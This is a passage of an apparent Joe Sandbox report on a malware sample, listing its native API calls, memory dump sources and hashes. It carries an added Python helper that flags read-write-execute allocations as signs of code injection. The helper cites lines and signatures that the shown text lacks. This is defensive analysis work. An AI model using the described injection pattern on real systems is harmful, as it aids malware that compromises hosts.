                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: df073bc96a478ad95373646a6206053a0344060d6e364c2bcc6e0de6640884d7
                                            • Instruction ID: 69c37fb11e2f5eee866ddba396b0ccb0d923344698b40062e3b53735815f13d8
                                            • Opcode Fuzzy Hash: df073bc96a478ad95373646a6206053a0344060d6e364c2bcc6e0de6640884d7
                                            • Instruction Fuzzy Hash: 0101E8B6201108AFCB04DF89CC91EEB33A9EF8C754F158209FA1C97341DA34E8518BA5

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 248 41a360-41a376 249 41a37c-41a3b1 NtCreateFile 248->249 250 41a377 call 41af60 248->250 250->249
                                            APIs
                                            • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                            • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                            • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 252 41a53a-41a556 253 41a55c-41a57d NtAllocateVirtualMemory 252->253 254 41a557 call 41af60 252->254 254->253
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 2d9f8a3505e228802d8c59eba0b7485e4d3d83cedfb6fe9d2e50aae9665707ea
                                            • Instruction ID: e042510b395ddda566e7e43e8d6fa4984aaa49d8af6ec77f50fa2295e50ab01e
                                            • Opcode Fuzzy Hash: 2d9f8a3505e228802d8c59eba0b7485e4d3d83cedfb6fe9d2e50aae9665707ea
                                            • Instruction Fuzzy Hash: 9BF0F8B2200218ABDB14DF89DC85EE777ADEF88754F158249FE0997241C630E811CBA4

                                            Control-flow Graph (basic blocks: id address-range calls; edges: id->id)
                                            • 255 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                            • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                            • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                            APIs
                                            • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
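The API entries above list the raw stack slots Joe Sandbox captured at each call site rather than named parameters, which makes the injection-relevant NtAllocateVirtualMemory flags (00003000 and 00000040 in the entry at 0041A579) easy to misread by hand. The following Python is an added triage helper and is not part of the Joe Sandbox report or its IDA plugin: it parses API lines in exactly the format printed above (the sample input is the five entries from this page, embedded as a constructed list), decodes the MEM_* and PAGE_* constants from winnt.h, and flags writable-executable allocations. Because slot positions in a stack dump are not reliable, it does not assume a parameter index; it scans for the first adjacent pair of values that form a valid allocation-type/protection combination. That scan is a heuristic of this example, not a documented property of the report format.

```python
"""Added triage helper for Joe Sandbox 'APIs' lines (not part of the report)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample input: the five API lines printed in the function blocks
# above, copied verbatim (bullet included) so the parser sees the real format,
# plus one non-API line that must be ignored.
SAMPLE_LINES = [
    "• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455",
    "• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62",
    "• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD",
    "• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579",
    "• NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5",
    "Memory Dump Source",
]

# Documented winnt.h constants; only the bits needed to read an allocation.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x80000: "MEM_RESET",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
MEM_MASK = sum(MEM_FLAGS)
PAGE_BASE = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
             0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
             0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
WRITABLE_EXECUTABLE = {0x40, 0x80}

# One report line: "<api>.<module>(<slot>,<slot>,...), ref: <hex address>"
API_LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]            # raw stack slots as printed; "?" = unreadable
    ref: int                   # address of the call instruction
    notes: List[str] = field(default_factory=list)


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m.group("args").split(",")]
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def _hexval(slot: str) -> Optional[int]:
    try:
        return int(slot, 16)
    except ValueError:         # "?" or a slot the sandbox rendered as ASCII ("rMA")
        return None


def is_mem_flags(v: int) -> bool:
    return v != 0 and (v & ~MEM_MASK) == 0


def is_page_protect(v: int) -> bool:
    return (v & 0xFF) in PAGE_BASE and (v & ~(0xFF | sum(PAGE_MODIFIERS))) == 0


def decode_mem(v: int) -> str:
    return " | ".join(n for bit, n in MEM_FLAGS.items() if v & bit)


def decode_page(v: int) -> str:
    return " | ".join([PAGE_BASE[v & 0xFF]] + [n for bit, n in PAGE_MODIFIERS.items() if v & bit])


def find_alloc_pair(call: ApiCall) -> Optional[Tuple[int, int]]:
    """Locate (AllocationType, Protect) for NtAllocateVirtualMemory.

    The report prints raw stack slots at the call site, not named parameters,
    so fixed indices cannot be trusted.  Heuristic (assumption of this example):
    take the first adjacent pair that is a well-formed (MEM_*, PAGE_*) combination."""
    vals = [_hexval(a) for a in call.args]
    for a, b in zip(vals, vals[1:]):
        if a is not None and b is not None and is_mem_flags(a) and is_page_protect(b):
            return a, b
    return None


def triage(lines) -> List[ApiCall]:
    """Parse every API line and annotate allocations with decoded flags."""
    calls = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        if call.api == "NtAllocateVirtualMemory":
            pair = find_alloc_pair(call)
            if pair is None:
                call.notes.append("allocation flags not recoverable from stack dump")
            else:
                mem, page = pair
                call.notes.append(f"{decode_mem(mem)}, {decode_page(page)}")
                if (page & 0xFF) in WRITABLE_EXECUTABLE:
                    call.notes.append("RWX allocation: staging buffer for injected code")
        calls.append(call)
    return calls


def rwx_allocations(calls: List[ApiCall]) -> List[int]:
    """Call-site addresses of allocations that are both writable and executable."""
    return [c.ref for c in calls if any(n.startswith("RWX") for n in c.notes)]


if __name__ == "__main__":
    for c in triage(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.api:<24} {'; '.join(c.notes)}")
```

Run stand-alone, the block prints one line per call; the entry at 0041A579 decodes as MEM_COMMIT | MEM_RESERVE with PAGE_EXECUTE_READWRITE, the combination a loader requests before writing and then executing a payload in the same region, which is why it is the first thing to look for when a report carries the process-hollowing and thread-injection signatures listed at the top of this page.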
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: e2f06b1fc95efa57fe6b2999b9adb24a34c23daf4540c6a96cfd996ffd374ca4
                                            • Instruction ID: 2152f2b36151b63d83044326392cfcbe347094debb2555fcbb8737a6821d8568
                                            • Opcode Fuzzy Hash: e2f06b1fc95efa57fe6b2999b9adb24a34c23daf4540c6a96cfd996ffd374ca4
                                            • Instruction Fuzzy Hash: B990026121240003410571584418656404A97E0201B95C021E24145A0DC52589916225
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: cd0a44772602fac3e62ed8dbb6ecdf46f731e8806e702ef163b5c48212e227fd
                                            • Instruction ID: 54c444e475ac1512e97bf3bca6e84b589bba5fc20b3423107526834dbc336310
                                            • Opcode Fuzzy Hash: cd0a44772602fac3e62ed8dbb6ecdf46f731e8806e702ef163b5c48212e227fd
                                            • Instruction Fuzzy Hash: AA90023121140802D1807158440868A004597D1301FD5C015A1425664DCA158B5977A1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ff50f549a789e30d9c701643555a19fdb796d208374053e3a6e69de390a7cb3c
                                            • Instruction ID: 904889021aa289d1cd53ad7b7aba1aacb445f0c5371759b765b87f6b1400a9b6
                                            • Opcode Fuzzy Hash: ff50f549a789e30d9c701643555a19fdb796d208374053e3a6e69de390a7cb3c
                                            • Instruction Fuzzy Hash: 2E900225221400030105B5580708547008697D5351395C021F2415560CD62189615221
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d253299d320be2f706b463f9ffd2d250e25d4d04420356691affe56d6d886aa9
                                            • Instruction ID: 20b9444ca0a105aabe48e4b499d912d50205eb0904afc325470dae0b07b074fe
                                            • Opcode Fuzzy Hash: d253299d320be2f706b463f9ffd2d250e25d4d04420356691affe56d6d886aa9
                                            • Instruction Fuzzy Hash: 2690043131140003D140715C541C7474045F7F1301FD5D011F1C14574CDD15CD575333
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 91676181121b4d73cc021eee11a8e3d6427f900ac7f62d210be5e7f7ea208824
                                            • Instruction ID: f0ac06410b8912cd7df769b16a8f780e8d68a10206ae28af63836f1d6dc5a2da
                                            • Opcode Fuzzy Hash: 91676181121b4d73cc021eee11a8e3d6427f900ac7f62d210be5e7f7ea208824
                                            • Instruction Fuzzy Hash: 4890022922340002D1807158540C64A004597D1202FD5D415A1415568CC91589695321
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 96de625edcfd1caa9b08f087ff39d0bd3247c717cd786ecad1edf97f47448b3a
                                            • Instruction ID: 76fd6c7af6552006e516ca2a8d58551082850974d7772840a4dece7a67984853
                                            • Opcode Fuzzy Hash: 96de625edcfd1caa9b08f087ff39d0bd3247c717cd786ecad1edf97f47448b3a
                                            • Instruction Fuzzy Hash: FB90023121140413D11171584508747004997D0241FD5C412A1824568DD6568A52A221
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 86634568d6f16f6f776776b02552fb04d3cd3137bd684988d3d632ca08a89962
                                            • Instruction ID: 72c3d67168cf6d5ad17396c7c2e86a65070e2b6bd871cb1bdc40d7c7f65e7e2a
                                            • Opcode Fuzzy Hash: 86634568d6f16f6f776776b02552fb04d3cd3137bd684988d3d632ca08a89962
                                            • Instruction Fuzzy Hash: A6900221252441525545B15844085474046A7E02417D5C012A2814960CC5269956D721
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 72ac03bc8da569596a0e298529f21ed327a60886b45fd6040f2d4ffe5d49768c
                                            • Instruction ID: 9f1da61fdb85b1b17eb65bb797a6610cb4ed7c7fd46f0231109b2e0f0857fd88
                                            • Opcode Fuzzy Hash: 72ac03bc8da569596a0e298529f21ed327a60886b45fd6040f2d4ffe5d49768c
                                            • Instruction Fuzzy Hash: D290023121148802D1107158840878A004597D0301F99C411A5824668DC69589917221
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f09e0cd62de0c4ba344e1c7010c0965b657f07c4da1949b4aa681800eda54edd
                                            • Instruction ID: 7da10d00637b08173066ec9df47dfbe9cc4b81670c1fc7e1a8babd96b828c519
                                            • Opcode Fuzzy Hash: f09e0cd62de0c4ba344e1c7010c0965b657f07c4da1949b4aa681800eda54edd
                                            • Instruction Fuzzy Hash: AC90023121140402D1007598540C686004597E0301F95D011A6424565EC66589916231
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 10c75d5d6b69dde34a12c770a9a9ca2d7b988c6aa5f4c84dcc17ccc71c67ce56
                                            • Instruction ID: f24184c3628aa9da05191c0321f590413ac89e8d1a1552844165845a4afdfd95
                                            • Opcode Fuzzy Hash: 10c75d5d6b69dde34a12c770a9a9ca2d7b988c6aa5f4c84dcc17ccc71c67ce56
                                            • Instruction Fuzzy Hash: 2D90026135140442D10071584418B460045D7E1301F95C015E2464564DC619CD526226
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d76044cacf8bf5501c626047a93b3256aaf8c86e37d988d2a56e05cb8219f128
                                            • Instruction ID: 575654a8d8faa8a17742850b1cd3833765d017ba159044afcd566d18acdb94ca
                                            • Opcode Fuzzy Hash: d76044cacf8bf5501c626047a93b3256aaf8c86e37d988d2a56e05cb8219f128
                                            • Instruction Fuzzy Hash: 57900221611400424140716888489464045BBE1211795C121A1D98560DC55989655765
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b05b47a5a46fb3b6ac5f3ae83c7f74c718d075acceeddb311e945bbe82a1d0e8
                                            • Instruction ID: 65a524266a0f5f2ebc74d3e6fdf1c1237652d7890ef79a3818ba5ccf411a3d74
                                            • Opcode Fuzzy Hash: b05b47a5a46fb3b6ac5f3ae83c7f74c718d075acceeddb311e945bbe82a1d0e8
                                            • Instruction Fuzzy Hash: 5090023121180402D1007158481874B004597D0302F95C011A2564565DC62589516671
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 245aa14743d6cf9f08c27809f7dc2942f8c2432a2ee0055542190d55c4ab882d
                                            • Instruction ID: d4d244471b5ae3a8c45aef57c0595e0964fda9c53e77e878eac40f04915d7441
                                            • Opcode Fuzzy Hash: 245aa14743d6cf9f08c27809f7dc2942f8c2432a2ee0055542190d55c4ab882d
                                            • Instruction Fuzzy Hash: 97900221221C0042D20075684C18B47004597D0303F95C115A1554564CC91589615621
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a696487e7190b2948b82147e4cb9c5ec04a62253d2a33c4ef8b47d0edf18731d
                                            • Instruction ID: a5a0fff02aa92542096c6c92e87f8e021bd684e7b3ad8af089ac2c0cd9ec2dda
                                            • Opcode Fuzzy Hash: a696487e7190b2948b82147e4cb9c5ec04a62253d2a33c4ef8b47d0edf18731d
                                            • Instruction Fuzzy Hash: 2690027121140402D14071584408786004597D0301F95C011A6464564EC6598ED56765
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2207818730.0000000001260000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1260000_HHhHh.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a319b26b2a463597cf56078f7e1431b9d3f24cb94d78c5e6892adfb553ffc123
                                            • Instruction ID: 04fe1394417e44057a6f3721e6d378d42e5396d4a5f3106463a3257c2e5f3895
                                            • Opcode Fuzzy Hash: a319b26b2a463597cf56078f7e1431b9d3f24cb94d78c5e6892adfb553ffc123
                                            • Instruction Fuzzy Hash: 1790022161140502D10171584408656004A97D0241FD5C022A2424565ECA258A92A231
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                            • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                            • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

                                            Control-flow Graph

                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID: .AP
                                            • API String ID: 3899507212-3996626295
                                            • Opcode ID: e61b40c025574b401a78bfe9db2f539b606469edda4e5e6174c8b14cf0485e2a
                                            • Instruction ID: b3a63027f1f00926f1fb70441b8d6ccb232baaf08920b71239fd0eb05aca1e60
                                            • Opcode Fuzzy Hash: e61b40c025574b401a78bfe9db2f539b606469edda4e5e6174c8b14cf0485e2a
                                            • Instruction Fuzzy Hash: 74117CB5200108AFDB24DF99CC81EEB77A9EF88354F118559FD0CAB241CA34E911CBB5

                                            Control-flow Graph

                                            control_flow_graph 11 41a630-41a661 call 41af60 RtlAllocateHeap
                                            APIs
                                            • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 6EA
                                            • API String ID: 1279760036-1400015478
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0

                                            Control-flow Graph

                                            control_flow_graph 209 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 218 40835c-40836e PostThreadMessageW 209->218 219 40838e-408392 209->219 220 408370-40838a call 40a480 218->220 221 40838d 218->221 220->221 221->219
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                            • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                            • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

                                            Control-flow Graph

                                            control_flow_graph 258 41a7c4-41a7ea call 41af60 261 41a7ef-41a804 LookupPrivilegeValueW 258->261
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 0ae6ed938a06a61c109d6f046993a7fd160e32c36c9b4a6597b5ff70a7312098
                                            • Instruction ID: 25b5469650b98974735db6c4d2d2a304ca4a49614d427224d27622a745289fdf
                                            • Opcode Fuzzy Hash: 0ae6ed938a06a61c109d6f046993a7fd160e32c36c9b4a6597b5ff70a7312098
                                            • Instruction Fuzzy Hash: A3F06DB56002187BCB20DF59CC82FEB3B69EF89650F108155F94CAB251CA31A856CBB5

                                            Control-flow Graph

                                            control_flow_graph 262 41a662-41a687 call 41af60 264 41a68c-41a6a1 RtlFreeHeap 262->264
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_400000_HHhHh.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 671ac05dce972b1bff80523cdb79ed1244b733bce631a93464474c43285afc5d
                                            • Instruction ID: cc78a00d4919f9925c8fa9310bc212e34f1e6036800ba04be0d35b26e09f4849
                                            • Opcode Fuzzy Hash: 671ac05dce972b1bff80523cdb79ed1244b733bce631a93464474c43285afc5d
                                            • Instruction Fuzzy Hash: F5E092B1200104BFDB14DFA4CC44EE73B69EF88754F118659F91C97382C531E915CAB0

                                            Control-flow Graph

